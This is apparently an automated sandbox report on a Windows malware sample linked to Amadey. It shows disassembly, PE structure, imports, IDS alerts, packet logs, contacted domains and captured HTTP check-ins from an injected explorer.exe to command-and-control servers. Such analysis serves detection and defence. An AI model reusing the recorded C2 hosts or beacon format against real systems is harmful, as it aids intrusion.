                                                                                                                                                                                push FFFFFFFEh
                                                                                                                                                                                pop esi
                                                                                                                                                                                xor edx, edx
                                                                                                                                                                                mov ecx, 0041F020h
                                                                                                                                                                                push edi
                                                                                                                                                                                mov eax, edx
                                                                                                                                                                                sar eax, 05h
                                                                                                                                                                                mov eax, dword ptr [02B55420h+eax*4]
                                                                                                                                                                                mov edi, edx
                                                                                                                                                                                and edi, 1Fh
                                                                                                                                                                                shl edi, 06h
                                                                                                                                                                                mov eax, dword ptr [edi+eax]
                                                                                                                                                                                cmp eax, FFFFFFFFh
                                                                                                                                                                                je 00007FD33CD4DFFAh
                                                                                                                                                                                cmp eax, esi
                                                                                                                                                                                je 00007FD33CD4DFF6h
                                                                                                                                                                                test eax, eax
                                                                                                                                                                                jne 00007FD33CD4DFF4h
                                                                                                                                                                                mov dword ptr [ecx], esi
                                                                                                                                                                                add ecx, 20h
                                                                                                                                                                                inc edx
                                                                                                                                                                                cmp ecx, 0041F080h
                                                                                                                                                                                jl 00007FD33CD4DFC0h
                                                                                                                                                                                pop edi
                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                pop esi
                                                                                                                                                                                ret
                                                                                                                                                                                call 00007FD33CD4F643h
                                                                                                                                                                                cmp byte ptr [00000000h], 00000000h

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1d834          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x275a000        0x8080        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x151b0          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x185c0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x15000          0x164         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text     0x1000           0x13e90       0x14000   False     0.772229003906   data       7.46968213296  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata    0x15000          0x906e        0x9200    False     0.223432148973   data       2.87249855126  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x1f000          0x2737560     0x1800    unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.livucuc  0x2757000        0x272         0x400     False     0.0166015625     data       0.0            IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vuf      0x2758000        0x270         0x400     False     0.0166015625     data       0.0            IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.duha     0x2759000        0x17          0x200     False     0.02734375       data       0.0            IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc     0x275a000        0x8080        0x8200    False     0.648347355769   data       6.08972992358  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name             RVA        Size    Type                  Language  Country
RT_CURSOR        0x2760ce0  0x130   data
RT_ICON          0x275a450  0xea8   data                  Oriya     India
RT_ICON          0x275b2f8  0x8a8   data                  Oriya     India
RT_ICON          0x275bba0  0x6c8   data                  Oriya     India
RT_ICON          0x275c268  0x568   GLS_BINARY_LSB_FIRST  Oriya     India
RT_ICON          0x275c7d0  0x25a8  data                  Oriya     India
RT_ICON          0x275ed78  0x10a8  data                  Oriya     India
RT_ICON          0x275fe20  0x988   data                  Oriya     India
RT_ICON          0x27607a8  0x468   GLS_BINARY_LSB_FIRST  Oriya     India
RT_STRING        0x2760fd8  0x360   data                  Spanish   Ecuador
RT_STRING        0x2761338  0x326   data                  Spanish   Ecuador
RT_STRING        0x2761660  0x47e   data                  Spanish   Ecuador
RT_STRING        0x2761ae0  0x304   data                  Spanish   Ecuador
RT_STRING        0x2761de8  0x292   data                  Spanish   Ecuador
RT_ACCELERATOR   0x2760c88  0x40    data                  Spanish   Ecuador
RT_ACCELERATOR   0x2760cc8  0x18    data                  Spanish   Ecuador
RT_GROUP_CURSOR  0x2760e10  0x14    data
RT_GROUP_ICON    0x2760c10  0x76    data                  Oriya     India
RT_VERSION       0x2760e28  0x1b0   data

Imports

DLL           Import
KERNEL32.dll  CommConfigDialogA, WaitForSingleObject, WriteConsoleInputA, CreateHardLinkA, GetConsoleAliasesA, GetSystemTimeAsFileTime, GetConsoleTitleA, GetConsoleAliasesLengthW, GetHandleInformation, GetThreadLocale, GetProcAddress, GetLongPathNameA, VirtualAlloc, HeapSize, FreeUserPhysicalPages, LoadLibraryA, LocalAlloc, EndUpdateResourceA, RaiseException, SetFilePointer, PulseEvent, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, TerminateProcess, GetCurrentProcess, HeapAlloc, IsProcessorFeaturePresent, GetLastError, HeapFree, CloseHandle, LoadLibraryW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, Sleep, GetConsoleCP, GetConsoleMode, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetStdHandle, FlushFileBuffers, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, CreateFileW
USER32.dll    SetCaretPos
GDI32.dll     GetCharWidthFloatA
ADVAPI32.dll  BackupEventLogA
MSIMG32.dll   GradientFill

Version Infos

Description     Data
InternalName    bomgpiaruci.iwa
ProductVersion  13.54.77.27
Copyright       Copyrighz (C) 2021, fudkat
Translation     0x0124 0x046a

Possible Origin

Language of compilation system  Country where language is spoken
Oriya                           India
Spanish                         Ecuador

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                             Source Port  Dest Port  Source IP    Dest IP
12/01/21-10:05:54.211834  TCP       2027700  ET TROJAN Amadey CnC Check-In       49875        80         192.168.2.3  185.215.113.35
12/01/21-10:05:54.408455  TCP       1087     WEB-MISC whisker tab splice attack  49876        80         192.168.2.3  185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.680209TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.684136TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.685190TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.685281TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.687574TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.690606TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.692115TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.692845TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.703493TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.704927TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.705428TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.718487TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.719101TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.721432TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.723236TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.757911TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.759030TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.759416TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.760240TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.761572TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.762873TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.764921TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.766376TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.767798TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.767873TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.772697TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.773630TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.775379TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.778500TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.782477TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.782516TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783241TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783277TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783473TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.783747TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.785933TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.788582TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.789010TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.789363TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.840143TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.841790TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.842416TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.845220TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.845828TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.846573TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.850280TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.851253TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.855419TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.864273TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.869473TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.869711TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.871214TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.872869TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.877576TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.891899TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.895215TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.901809TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.904751TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.905665TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.905864TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.906124TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.909444TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.909685TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:54.920324TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.084198TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.085586TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.087788TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.091230TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.092609TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.095401TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.095922TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35
                                                                                                                                                                                12/01/21-10:05:55.096160TCP1087WEB-MISC whisker tab splice attack4987680192.168.2.3185.215.113.35

                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                TCP Packets

Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                Dec 1, 2021 10:04:27.537714958 CET4975380192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.595101118 CET804975395.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.878122091 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.935216904 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:27.936881065 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.936999083 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.937012911 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:27.994172096 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.043939114 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.044023991 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.044369936 CET4975480192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.101336956 CET804975495.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.360445023 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.418559074 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.421931028 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.422101021 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.505357027 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505397081 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505409002 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505425930 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505444050 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505461931 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505476952 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505492926 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505510092 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505526066 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.505578995 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.505640030 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.563786030 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563821077 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563834906 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563852072 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563867092 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563884020 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563901901 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563918114 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.563961029 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.564013958 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566214085 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566241026 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566257954 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566274881 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566293955 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566308975 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566327095 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566343069 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566359997 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566380024 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566385984 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566402912 CET4975580192.168.2.395.213.165.249
                                                                                                                                                                                Dec 1, 2021 10:04:28.566410065 CET804975595.213.165.249192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:04:28.566426039 CET804975595.213.165.249192.168.2.3

UDP Packets

                                                                                                                                                                                Dec 1, 2021 10:05:00.059180975 CET53574478.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.154787064 CET6358353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.240900040 CET6409953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.258542061 CET53640998.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.432288885 CET6461053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.442418098 CET53635838.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.451920033 CET53646108.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.628663063 CET5198953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:00.648046017 CET53519898.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:00.821759939 CET5315253192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.143867016 CET53531528.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:01.369626999 CET6159053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.388787031 CET53615908.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:01.566164017 CET5607753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:01.583864927 CET53560778.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.517087936 CET5795153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.536447048 CET53579518.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.716141939 CET5327653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.735825062 CET53532768.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:06.926642895 CET6013553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:06.946532965 CET53601358.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.128762960 CET4984953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.148842096 CET53498498.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.336436033 CET6025353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.356832981 CET53602538.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.538578987 CET5870653192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.561150074 CET53587068.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.770040035 CET6267753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:07.790406942 CET53626778.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:07.986479044 CET6259553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.006221056 CET53625958.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.186501026 CET5118953192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.205960989 CET53511898.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.386497021 CET4996753192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.405668020 CET53499678.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:08.621098995 CET5145453192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:08.640774012 CET53514548.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:05:51.075542927 CET5636053192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET53563608.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:00.314538956 CET4925853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:00.418350935 CET53492588.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:05.627151966 CET5619553192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:05.667037964 CET53561958.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:06.656199932 CET5302153192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:06.675901890 CET53530218.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:12.151945114 CET5261853192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:12.252938032 CET53526188.8.8.8192.168.2.3
                                                                                                                                                                                Dec 1, 2021 10:06:15.523608923 CET5163353192.168.2.38.8.8.8
                                                                                                                                                                                Dec 1, 2021 10:06:15.543258905 CET53516338.8.8.8192.168.2.3

DNS Queries

DNS Answers


HTTP Request Dependency Graph

                                                                                                                                                                                • dagsykb.org
                                                                                                                                                                                • owgeqjie.net
                                                                                                                                                                                • rvwnoilj.net
                                                                                                                                                                                • ggqrkginit.org
                                                                                                                                                                                • vutak.org

HTTP Packets

Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.3  49759        162.159.135.233  443               C:\Windows\explorer.exe

Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
1           192.168.2.3  49749        95.213.165.249   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:26.041062117 CET  1096                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yubswhv.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: host-data-coin-11.com
Dec 1, 2021 10:04:26.148890972 CET  1097                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:26 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 19{i+,GO0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
10          192.168.2.3  49758        95.213.165.249   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:35.989181995 CET  2442                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dgpnslqhh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: host-data-coin-11.com
Dec 1, 2021 10:04:36.089900970 CET  2443                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Raw: 36 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 dd 4b d0 fe 26 85 21 ea a5 90 50 2e e2 be 4d 23 e3 b3 b4 6c fb 9f bc 50 ab 73 93 cb 32 40 5c 3c 0d 4b dd bb 4a be ff 57 99 bd d4 0b 8d 2b 80 cf 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 65I:82OB%,YR("XPK&!P.M#lPs2@\<KJW+0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
